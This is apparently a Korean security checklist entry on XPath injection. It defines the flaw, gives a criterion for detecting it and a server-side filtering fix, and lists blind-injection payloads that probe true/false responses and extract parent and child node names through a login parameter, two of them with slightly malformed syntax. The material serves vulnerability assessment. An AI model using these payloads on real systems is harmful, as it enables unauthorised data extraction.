07. XPath 인젝션

취약점 소개

---

조작된 XPath(XML Path Language) 쿼리를 보냄으로써 비정상적 데이터를 열람할 수 있는 취약점

→ XPath: XML 문서나 특정 요소-속성에 접근하기 위한 경로 지정 언어로 XPath 경로식을 이용하여 노드 형식으로 접근

→ XML 데이터 처리(XML 문서 검색하는 환경), XML DB(XML 형식으로 저장 관리하는 환경), ...에서 발생 가능성

 

판단 기준

---

XPath 쿼리가 실행되어 불필요한 데이터가 노출될 경우

 

점검 사례

---

- ' and 'a' = 'a , ' and 'a' = 'b, ' and 1=1, ' and 1=2, ... 값 삽입하여 참, 거짓에 반환되는 페이지가 다른지 확인

- ' or count(parent::*[position()=1])=0 or 'a'='b, ' or count(parent::*[position()=1])>0 or 'a'='b, 1 or count(parent::*[position()=1])=0,  1 or count(parent::*[position()=1])>0 

 

ex) 부모노드 이름의 길이 반환 ({ }는 임의 숫자)

?login=neo' and string-length(name(parent::*))={} or 1=2 or '&password=&form=submit

 

ex) 부모노드 이름 확인

?login=neo' and substring(name([parent::*),{},='{}' or 1=2 or '&password=&form=submit

 

ex) 자식노드 이름 확인

' and substring(name(child::*[position()={}]))={} or 1=2 or '

 

보안 설정

---

- XPath 쿼리 특수문자 필터링을 Server Side 단에서 처리하고, 되도록 허용된 문자 이외에 입력이 허용되지 않도록 적용 필요

- ...